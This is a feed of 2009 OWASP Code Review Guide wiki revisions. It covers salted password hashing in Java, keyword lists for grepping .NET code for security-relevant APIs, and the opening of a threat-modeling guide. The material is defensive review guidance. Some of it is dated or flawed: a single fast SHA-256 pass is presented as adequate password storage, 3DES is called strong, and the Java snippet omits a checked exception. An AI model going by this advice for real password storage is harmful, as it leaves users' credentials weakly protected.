Storing simply hashed passwords has its issues, such as the possibility to identify two identical passwords (identical hashes) and also the [http://en.wikipedia.org/wiki/Birthday_paradox birthday attack]. A countermeasure for such issues is to introduce a salt. A salt is a random number of a fixed length. This salt must be different for each stored entry. It must be stored as clear text next to the hashed password:&lt;br /&gt;
&lt;br /&gt;
 import java.security.MessageDigest;&lt;br /&gt;
 public byte[] getHash(String password, byte[] salt) throws NoSuchAlgorithmException {&lt;br /&gt;
       MessageDigest digest = MessageDigest.getInstance(&amp;quot;SHA-256&amp;quot;);&lt;br /&gt;
       digest.reset();&lt;br /&gt;
       digest.update(salt);&lt;br /&gt;
       return digest.digest(password.getBytes(&amp;quot;UTF-8&amp;quot;));&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
===Vulnerabilities related to authentication ===&lt;br /&gt;
&lt;br /&gt;
There are many issues relating to authentication which utilise form fields. Inadequate field validation can give rise to the following issues:&lt;br /&gt;
&lt;br /&gt;
*[[Reviewing Code for SQL Injection]]&lt;br /&gt;
SQL injection can be used to bypass authentication functionality and even add a malicious user to a system for future use.&lt;br /&gt;
*[[Reviewing Code for Data Validation]]&lt;br /&gt;
Data validation of all external input must be performed. This also goes for authentication fields.&lt;br /&gt;
*[[Reviewing code for XSS issues]]&lt;br /&gt;
Cross site scripting can be used on the authentication page to perform identity theft, Phishing, and session hijacking attacks.&lt;br /&gt;
*[[Reviewing Code for Error Handling]]&lt;br /&gt;
Bad/weak error handling can be used to establish the internal workings of the authentication functionality such as giving insight into the database structure, insight into valid and invalid user IDs, etc.&lt;br /&gt;
*[[Hashing Java|Hashing with Java]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Crawling_Code&amp;diff=60152</id>
		<title>Crawling Code</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Crawling_Code&amp;diff=60152"/>
				<updated>2009-05-05T11:36:50Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Searching for Code in .NET */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
Crawling code is the practice of scanning a code base of the review target in question. It is, in effect, looking for key pointers wherein a possible security vulnerability might reside. Certain APIs are related to interfacing to the external world or file IO or user management, which are key areas for an attacker to focus on. In crawling code we look for APIs relating to these areas. We also need to look for business logic areas which may cause security issues, but generally these are bespoke methods which have bespoke names and can not be detected directly, even though we may touch on certain methods due to their relationship with a certain key API. &lt;br /&gt;
&lt;br /&gt;
We also need to look for common issues relating to a specific language; issues that may not be *security* related but which may affect the stability/availability of the application in the case of extraordinary circumstances. Other issues when performing a code review are areas such a simple copyright notice in order to protect one’s intellectual property. &lt;br /&gt;
&lt;br /&gt;
Crawling code can be done manually or in an automated fashion using automated tools. Tools as simple as grep or wingrep can be used. Other tools are available which would search for key words relating to a specific programming language. &lt;br /&gt;
&lt;br /&gt;
The following sections shall cover the function of crawing code for Java/J2EE, .NET and Classic ASP.  This section is best used in conjunction with the [[Security Code Review Coverage|transactional analysis]] section also detailed in this guide.&lt;br /&gt;
&lt;br /&gt;
==Searching for Key Indicators== &lt;br /&gt;
The basis of the code review is to locate and analyse areas of code which may have application security implications. Assuming the code reviewer has a thorough understanding of the code, what it is intended to do, and the context in which it is to be used, firstly one needs to sweep the code base for areas of interest. &lt;br /&gt;
&lt;br /&gt;
This can be done by performing a text search on the code base looking for keywords relating to APIs and functions. Below is a guide for .NET framework 1.1 &amp;amp; 2.0 &lt;br /&gt;
&lt;br /&gt;
==Searching for Code in .NET== &lt;br /&gt;
Firstly one needs to be familiar with the tools one can use in order to perform text searching, following this one needs to know what to look for. &lt;br /&gt;
&lt;br /&gt;
In this section we will assume you have a copy of Visual Studio (VS) .NET at hand. VS has two types of search &amp;quot;Find in Files&amp;quot; and a cmd line tool called Findstr.&lt;br /&gt;
&lt;br /&gt;
The test search tools in XP is not great in my experience and if one has to use this make sure SP2 in installed as it works better. To start off, one should scan thorough the code looking for common patterns or keywords such as &amp;quot;User&amp;quot;, &amp;quot;Password&amp;quot;, &amp;quot;Pswd&amp;quot;, &amp;quot;Key&amp;quot;, &amp;quot;Http&amp;quot;, etc... This can be done using the &amp;quot;Find in Files&amp;quot; tool in VS or using findstring as follows: &lt;br /&gt;
&lt;br /&gt;
findstr /s /m /i /d:c:\projects\codebase\sec &amp;quot;http&amp;quot; *.*&lt;br /&gt;
&lt;br /&gt;
==HTTP Request Strings==&lt;br /&gt;
Requests from external sources are obviously a key area of a security code review. We need to ensure that all HTTP requests received are data validated for composition, max and min length, and if the data falls with the realms of the parameter white-list. Bottom-line is this is a key area to look at and ensure security is enabled. &lt;br /&gt;
&lt;br /&gt;
request.accepttypes&amp;lt;br&amp;gt;&lt;br /&gt;
request.browser&amp;lt;br&amp;gt;&lt;br /&gt;
request.files&amp;lt;br&amp;gt;&lt;br /&gt;
request.headers&amp;lt;br&amp;gt;&lt;br /&gt;
request.httpmethod&amp;lt;br&amp;gt;&lt;br /&gt;
request.item&amp;lt;br&amp;gt;&lt;br /&gt;
request.querystring&amp;lt;br&amp;gt;&lt;br /&gt;
request.form &amp;lt;br&amp;gt;&lt;br /&gt;
request.cookies&amp;lt;br&amp;gt;&lt;br /&gt;
request.certificate&amp;lt;br&amp;gt;&lt;br /&gt;
request.rawurl&amp;lt;br&amp;gt;&lt;br /&gt;
request.servervariables&amp;lt;br&amp;gt;&lt;br /&gt;
request.url&amp;lt;br&amp;gt;&lt;br /&gt;
request.urlreferrer&amp;lt;br&amp;gt;&lt;br /&gt;
request.useragent&amp;lt;br&amp;gt;&lt;br /&gt;
request.userlanguages&amp;lt;br&amp;gt;&lt;br /&gt;
request.IsSecureConnection&amp;lt;br&amp;gt;&lt;br /&gt;
request.TotalBytes&amp;lt;br&amp;gt;&lt;br /&gt;
request.BinaryRead&amp;lt;br&amp;gt;&lt;br /&gt;
InputStream&amp;lt;br&amp;gt;&lt;br /&gt;
HiddenField.Value&amp;lt;br&amp;gt;&lt;br /&gt;
TextBox.Text&amp;lt;br&amp;gt;&lt;br /&gt;
recordSet&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==HTML Output==&lt;br /&gt;
Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks result from poor response validation. XSS relies on this somewhat. &lt;br /&gt;
&lt;br /&gt;
response.write &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;% = &amp;lt;br&amp;gt;&lt;br /&gt;
HttpUtility &amp;lt;br&amp;gt;&lt;br /&gt;
HtmlEncode &amp;lt;br&amp;gt;&lt;br /&gt;
UrlEncode &amp;lt;br&amp;gt;&lt;br /&gt;
innerText &amp;lt;br&amp;gt;&lt;br /&gt;
innerHTML &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==SQL &amp;amp; Database==&lt;br /&gt;
Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determine if the application is vulnerable to SQL injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter, or OdbcParameter(System.Data.SqlClient). These are typed and treat parameters as the literal value and not executable code in the database. &lt;br /&gt;
&lt;br /&gt;
exec sp_executesql &amp;lt;br&amp;gt;&lt;br /&gt;
execute sp_executesql &amp;lt;br&amp;gt;&lt;br /&gt;
select from &amp;lt;br&amp;gt;&lt;br /&gt;
Insert &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
update &amp;lt;br&amp;gt;&lt;br /&gt;
delete from where &amp;lt;br&amp;gt;&lt;br /&gt;
delete &amp;lt;br&amp;gt;&lt;br /&gt;
exec sp_ &amp;lt;br&amp;gt;&lt;br /&gt;
execute sp_ &amp;lt;br&amp;gt;&lt;br /&gt;
exec xp_ &amp;lt;br&amp;gt;&lt;br /&gt;
execute sp_ &amp;lt;br&amp;gt;&lt;br /&gt;
exec @ &amp;lt;br&amp;gt;&lt;br /&gt;
execute @ &amp;lt;br&amp;gt;&lt;br /&gt;
executestatement &amp;lt;br&amp;gt;&lt;br /&gt;
executeSQL &amp;lt;br&amp;gt;&lt;br /&gt;
setfilter &amp;lt;br&amp;gt;&lt;br /&gt;
executeQuery &amp;lt;br&amp;gt;&lt;br /&gt;
GetQueryResultInXML &amp;lt;br&amp;gt;&lt;br /&gt;
adodb &amp;lt;br&amp;gt;&lt;br /&gt;
sqloledb &amp;lt;br&amp;gt;&lt;br /&gt;
sql server &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
driver &amp;lt;br&amp;gt;&lt;br /&gt;
Server.CreateObject &amp;lt;br&amp;gt;&lt;br /&gt;
.Provider &amp;lt;br&amp;gt;&lt;br /&gt;
.Open &amp;lt;br&amp;gt;&lt;br /&gt;
ADODB.recordset &amp;lt;br&amp;gt;&lt;br /&gt;
New OleDbConnection &amp;lt;br&amp;gt;&lt;br /&gt;
ExecuteReader &amp;lt;br&amp;gt;&lt;br /&gt;
DataSource &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
SqlCommand &amp;lt;br&amp;gt;&lt;br /&gt;
Microsoft.Jet &amp;lt;br&amp;gt;&lt;br /&gt;
SqlDataReader &amp;lt;br&amp;gt;&lt;br /&gt;
ExecuteReader &amp;lt;br&amp;gt;&lt;br /&gt;
GetString &amp;lt;br&amp;gt;&lt;br /&gt;
SqlDataAdapter &amp;lt;br&amp;gt; &lt;br /&gt;
CommandType &amp;lt;br&amp;gt;&lt;br /&gt;
StoredProcedure &amp;lt;br&amp;gt;&lt;br /&gt;
System.Data.sql &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Cookies==&lt;br /&gt;
Cookie manipulation can be key to various application security exploits, such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionality, as this would have a bearing on session security. &lt;br /&gt;
&lt;br /&gt;
System.Net.Cookie &amp;lt;br&amp;gt;&lt;br /&gt;
HTTPOnly &amp;lt;br&amp;gt;&lt;br /&gt;
document.cookie &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==HTML Tags==&lt;br /&gt;
Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display and use of such tags within a web application. &lt;br /&gt;
&lt;br /&gt;
HtmlEncode &amp;lt;br&amp;gt;&lt;br /&gt;
URLEncode &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;applet&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;frameset&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;embed&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;frame&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;iframe&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;img&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;layer&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;ilayer&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;meta&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;object&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;body&amp;gt;  &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;frame security &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;iframe security &amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
==Input Controls==&lt;br /&gt;
The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application. &lt;br /&gt;
&lt;br /&gt;
system.web.ui.htmlcontrols.htmlinputhidden&lt;br /&gt;
system.web.ui.webcontrols.hiddenfield&lt;br /&gt;
system.web.ui.webcontrols.hyperlink&lt;br /&gt;
system.web.ui.webcontrols.textbox&lt;br /&gt;
system.web.ui.webcontrols.label&lt;br /&gt;
system.web.ui.webcontrols.linkbutton&lt;br /&gt;
system.web.ui.webcontrols.listbox&lt;br /&gt;
system.web.ui.webcontrols.checkboxlist&lt;br /&gt;
system.web.ui.webcontrols.dropdownlist&lt;br /&gt;
&lt;br /&gt;
==WEB.Config==&lt;br /&gt;
The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application’s root directory. For ASP.NET applications, web.config contains information about most aspects of the application’s operation. &lt;br /&gt;
&lt;br /&gt;
requestEncoding &amp;lt;br&amp;gt;&lt;br /&gt;
responseEncoding &amp;lt;br&amp;gt;&lt;br /&gt;
trace &amp;lt;br&amp;gt;&lt;br /&gt;
authorization &amp;lt;br&amp;gt;&lt;br /&gt;
compilation &amp;lt;br&amp;gt;&lt;br /&gt;
CustomErrors &amp;lt;br&amp;gt;&lt;br /&gt;
httpCookies &amp;lt;br&amp;gt;&lt;br /&gt;
httpHandlers &amp;lt;br&amp;gt;&lt;br /&gt;
httpRuntime &amp;lt;br&amp;gt;&lt;br /&gt;
sessionState &amp;lt;br&amp;gt;&lt;br /&gt;
maxRequestLength &amp;lt;br&amp;gt;&lt;br /&gt;
debug &amp;lt;br&amp;gt;&lt;br /&gt;
forms protection &amp;lt;br&amp;gt;&lt;br /&gt;
appSettings &amp;lt;br&amp;gt;&lt;br /&gt;
ConfigurationSettings &amp;lt;br&amp;gt;&lt;br /&gt;
appSettings &amp;lt;br&amp;gt;&lt;br /&gt;
connectionStrings &amp;lt;br&amp;gt;&lt;br /&gt;
authentication mode &amp;lt;br&amp;gt;&lt;br /&gt;
allow &amp;lt;br&amp;gt;&lt;br /&gt;
deny &amp;lt;br&amp;gt;&lt;br /&gt;
credentials &amp;lt;br&amp;gt;&lt;br /&gt;
identity impersonate &amp;lt;br&amp;gt;&lt;br /&gt;
timeout &amp;lt;br&amp;gt;&lt;br /&gt;
remote &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==global.asax==&lt;br /&gt;
Each application has its own Global.asax if one is required. Global.asax sets the event code and values for an application using scripts. One must ensure that application variables do not contain sensitive information, as they are accessible to the whole application and to all users within it. &lt;br /&gt;
&lt;br /&gt;
Application_OnAuthenticateRequest &amp;lt;br&amp;gt;&lt;br /&gt;
Application_OnAuthorizeRequest &amp;lt;br&amp;gt;&lt;br /&gt;
Session_OnStart &amp;lt;br&amp;gt;&lt;br /&gt;
Session_OnEnd &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Logging==&lt;br /&gt;
Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determine if any sensitive information is being logged. Common mistakes are logging userID in conjunction with passwords within the authentication functionality or logging database requests which may contains sensitive data. &lt;br /&gt;
&lt;br /&gt;
log4net &amp;lt;br&amp;gt;&lt;br /&gt;
Console.WriteLine &amp;lt;br&amp;gt;&lt;br /&gt;
System.Diagnostics.Debug &amp;lt;br&amp;gt;&lt;br /&gt;
System.Diagnostics.Trace &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Machine.config==&lt;br /&gt;
Its important that many variables in machine.config can be overridden in the web.config file for a particular application. &lt;br /&gt;
&lt;br /&gt;
validateRequest  &amp;lt;br&amp;gt;&lt;br /&gt;
enableViewState &amp;lt;br&amp;gt;&lt;br /&gt;
enableViewStateMac &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Threads and Concurrency==&lt;br /&gt;
Locating code that contains multithreaded functions. Concurrency issues can result in race conditions which may result in security vulnerabilities. The Thread keyword is where new threads objects are created. Code that uses static global variables which hold sensitive security information may cause session issues. Code that uses static constructors may also cause issues between threads. Not synchronizing the Dispose method may cause issues if a number of threads call Dispose at the same time, this may cause resource release issues. &lt;br /&gt;
&lt;br /&gt;
Thread &amp;lt;br&amp;gt;&lt;br /&gt;
Dispose &amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
==Class Design==&lt;br /&gt;
Public and Sealed relate to the design at class level. Classes which are not intended to be derived from should be sealed. Make sure all class fields are Public for a reason. Don't expose anything you don't need to. &lt;br /&gt;
&lt;br /&gt;
Public &amp;lt;br&amp;gt;&lt;br /&gt;
Sealed &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Reflection, Serialization==&lt;br /&gt;
Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data, does it need to be serialized?&lt;br /&gt;
&lt;br /&gt;
Serializable &amp;lt;br&amp;gt;&lt;br /&gt;
AllowPartiallyTrustedCallersAttribute &amp;lt;br&amp;gt;&lt;br /&gt;
GetObjectData  &amp;lt;br&amp;gt;&lt;br /&gt;
StrongNameIdentityPermission &amp;lt;br&amp;gt;&lt;br /&gt;
StrongNameIdentity &amp;lt;br&amp;gt;&lt;br /&gt;
System.Reflection &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Exceptions &amp;amp; Errors==&lt;br /&gt;
Ensure that the catch blocks do not leak information to the user in the case of an exception. Ensure when dealing with resources that the finally block is used. Having trace enabled is not great from an information leakage perspective. Ensure customised errors are properly implemented. &lt;br /&gt;
&lt;br /&gt;
catch{ &amp;lt;br&amp;gt;&lt;br /&gt;
Finally &amp;lt;br&amp;gt;&lt;br /&gt;
trace enabled &amp;lt;br&amp;gt;&lt;br /&gt;
customErrors mode &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Crypto==&lt;br /&gt;
If cryptography is used then is a strong enough cipher used, i.e. AES or 3DES? What size key is used? The larger the better. Where is hashing performed? Are passwords that are being persisted hashed? They should be. How are random numbers generated? Is the PRNG &amp;quot;random enough&amp;quot;? &lt;br /&gt;
&lt;br /&gt;
RNGCryptoServiceProvider &amp;lt;br&amp;gt;&lt;br /&gt;
SHA &amp;lt;br&amp;gt;&lt;br /&gt;
MD5 &amp;lt;br&amp;gt;&lt;br /&gt;
base64 &amp;lt;br&amp;gt;&lt;br /&gt;
xor &amp;lt;br&amp;gt;&lt;br /&gt;
DES &amp;lt;br&amp;gt;&lt;br /&gt;
RC2 &amp;lt;br&amp;gt;&lt;br /&gt;
System.Random &amp;lt;br&amp;gt;&lt;br /&gt;
Random &amp;lt;br&amp;gt;&lt;br /&gt;
System.Security.Cryptography &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Storage==&lt;br /&gt;
If storing sensitive data in memory, I recommend one uses the following. &lt;br /&gt;
&lt;br /&gt;
SecureString &amp;lt;br&amp;gt;&lt;br /&gt;
ProtectedMemory &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Authorization, Assert &amp;amp; Revert==&lt;br /&gt;
Bypassing the code access security permission? Not a good idea. Also below is a list of potentially dangerous permissions such as calling unmanaged code, outside the CLR. &lt;br /&gt;
&lt;br /&gt;
.RequestMinimum &amp;lt;br&amp;gt;&lt;br /&gt;
.RequestOptional &amp;lt;br&amp;gt;&lt;br /&gt;
Assert &amp;lt;br&amp;gt;&lt;br /&gt;
Debug.Assert &amp;lt;br&amp;gt;&lt;br /&gt;
CodeAccessPermission &amp;lt;br&amp;gt;&lt;br /&gt;
ReflectionPermission.MemberAccess &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlAppDomain &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.UnmanagedCode &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.SkipVerification &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlEvidence &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.SerializationFormatter &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlPrincipal &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlDomainPolicy &amp;lt;br&amp;gt;&lt;br /&gt;
SecurityPermission.ControlPolicy &amp;lt;br&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
==Legacy Methods==&lt;br /&gt;
printf &amp;lt;br&amp;gt;&lt;br /&gt;
strcpy &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Code Review Project]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60054</id>
		<title>Application Threat Modeling</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Application_Threat_Modeling&amp;diff=60054"/>
				<updated>2009-05-04T17:14:22Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Security Controls */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[OWASP Code Review Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Introduction===&lt;br /&gt;
Threat modeling is an approach for analyzing the security of an application. It is a structured approach that enables you to identify, quantify, and address the security risks associated with an application. Threat modeling is not an approach to reviewing code, but it does complement the security code review process. The inclusion of threat modeling in the SDLC can help to ensure that applications are being developed with security built-in from the very beginning. This, combined with the documentation produced as part of the threat modeling process, can give the reviewer a greater understanding of the system. This allows the reviewer to see where the entry points to the application are and the associated threats with each entry point. The concept of threat modeling is not new but there has been a clear mindset change in recent years. Modern threat modeling looks at a system from a potential attacker's perspective, as opposed to a defender's viewpoint. Microsoft have been strong advocates of the process over the past number of years. They have made threat modeling a core component of their SDLC, which they claim to be one of the reasons for the increased security of their products in recent years. &lt;br /&gt;
&lt;br /&gt;
When source code analysis is performed outside the SDLC, such as on existing applications, the results of the threat modeling help in reducing the complexity of the source code analysis by promoting an in-depth first approach vs. breadth first approach. Instead of reviewing all source code with equal focus, you can prioritize the security code review of components whose threat modeling has ranked with high risk threats. &lt;br /&gt;
&lt;br /&gt;
The threat modeling process can be decomposed into 3 high level steps:&lt;br /&gt;
&lt;br /&gt;
'''Step 1:''' Decompose the Application. &lt;br /&gt;
The first step in the threat modeling process is concerned with gaining an understanding of the application and how it interacts with external entities. This involves creating use-cases to understand how the application is used, identifying entry points to see where a potential attacker could interact with the application, identifying assets i.e. items/areas that the attacker would be interested in, and identifying trust levels which represent the access rights that the application will grant to external entities. This information is documented in the Threat Model document and it is also used to produce data flow diagrams (DFDs) for the application. The DFDs show the different paths through the system, highlighting the privilege boundaries. &lt;br /&gt;
&lt;br /&gt;
'''Step 2:''' Determine and rank threats.&lt;br /&gt;
Critical to the identification of threats is using a threat categorization methodology. A threat categorization such as STRIDE can be used, or the Application Security Frame (ASF) that defines threat categories such as Auditing &amp;amp; Logging, Authentication, Authorization, Configuration Management, Data Protection in Storage and Transit, Data Validation, Exception Management. The goal of the threat categorization is to help identify threats both from the attacker (STRIDE) and the defensive perspective (ASF). DFDs produced in step 1 help to identify the potential threat targets from the attacker's perspective, such as data sources, processes, data flows, and interactions with users. These threats can be identified further as the roots for threat trees; there is one tree for each threat goal. From the defensive perspective, ASF categorization helps to identify the threats as weaknesses of security controls for such threats. Common threat-lists with examples can help in the identification of such threats. Use and abuse cases can illustrate how existing protective measures could be bypassed, or where a lack of such protection exists. The determination of the security risk for each threat can be determined using a value-based risk model such as DREAD or a less subjective qualitative risk model based upon general risk factors (e.g. likelihood and impact).&lt;br /&gt;
&lt;br /&gt;
'''Step 3:''' Determine countermeasures and mitigation.&lt;br /&gt;
A lack of protection of a threat might indicate a vulnerability whose risk exposure could be mitigated with the implementation of a countermeasure. Such countermeasures can be identified using threat-countermeasure mapping lists. Once a risk ranking is assigned to the threats, it is possible to sort threats from the highest to the lowest risk, and prioritize the mitigation effort, such as by responding to such threats by applying the identified countermeasures. The risk mitigation strategy might involve evaluating these threats from the business impact that they pose and reducing  the risk. Other options might include taking the risk, assuming the business impact is acceptable because of compensating controls, informing the user of the threat, removing the risk posed by the threat completely, or the least preferable option, that is, to do nothing. &lt;br /&gt;
&lt;br /&gt;
Each of the above steps are documented as they are carried out. The resulting document is the threat model for the application. This guide will use an example to help explain the concepts behind threat modeling. The same example will be used throughout each of the 3 steps as a learning aid. The example that will be used is a college library website. At the end of the guide we will have produced the threat model for the college library website. Each of the steps in the threat modeling process are described in detail below.&lt;br /&gt;
&lt;br /&gt;
== Decompose the Application ==&lt;br /&gt;
The goal of this step is to gain an understanding of the application and how it interacts with external entities. This goal is achieved by information gathering and documentation. The information gathering process is carried out using a clearly defined structure, which ensures the correct information is collected. This structure also defines how the information should be documented to produce the Threat Model. &lt;br /&gt;
&lt;br /&gt;
==Threat Model Information==&lt;br /&gt;
The first item in the threat model is the information relating to the threat model. &lt;br /&gt;
This must include the the following:&lt;br /&gt;
&lt;br /&gt;
# '''Application Name''' - The name of the application.&lt;br /&gt;
# '''Application Version''' - The version of the application.&lt;br /&gt;
# '''Description''' - A high level description of the application.&lt;br /&gt;
# '''Document Owner''' - The owner of the threat modeling document. &lt;br /&gt;
# '''Participants''' - The participants involved in the threat modeling process for this application.&lt;br /&gt;
# '''Reviewer''' - The reviewer(s) of the threat model.&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&amp;lt;br/&amp;gt;&lt;br /&gt;
[[Category:FIXME|the list above includes an Application name, but the example does not have one]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;&amp;gt;Threat Model Information&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Application Version:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;1.0&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt; Description:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;The college library website is the first implementation of a website to provide librarians and library patrons (students and college staff) with online services. &lt;br /&gt;
As this is the first implementation of the website, the functionality will be limited. There will be three users of the application: &amp;lt;br/&amp;gt;&lt;br /&gt;
1. Students&amp;lt;br/&amp;gt;&lt;br /&gt;
2. Staff&amp;lt;br/&amp;gt;&lt;br /&gt;
3. Librarians&amp;lt;br/&amp;gt;&lt;br /&gt;
Staff and students will be able to log in and search for books, and staff members can request books. Librarians will be able to log in, add books, add users, and search for books.&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Document Owner:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Lowry&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#dddddd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Participants:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;David Rook&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr bgcolor=&amp;quot;#cccccc&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;th align=&amp;quot;left&amp;quot;&amp;gt;Reviewer:&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;Eoin Keary&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==External Dependencies==&lt;br /&gt;
External dependencies are items external to the code of the application that may pose a threat to the application. These items are typically still within the control of the organization, but possibly not within the control of the development team. The first area to look at when investigating external dependencies is how the application will be deployed in a production environment, and what are the requirements surrounding this. This involves looking at how the application is or is not intended to be run. For example if the application is expected to be run on a server that has been hardened to the organization's hardening standard and it is expected to sit behind a firewall, then this information should be documented in the external dependencies section. External dependencies should be documented as follows:&lt;br /&gt;
&lt;br /&gt;
# '''ID''' - A unique ID assigned to the external dependency.&lt;br /&gt;
# '''Description''' - A textual description of the external dependency.&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
Example:&lt;br /&gt;
&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;table align=&amp;quot;center&amp;quot; cellspacing=&amp;quot;1&amp;quot; CELLPADDING=&amp;quot;7&amp;quot;&amp;gt;&lt;br /&gt;
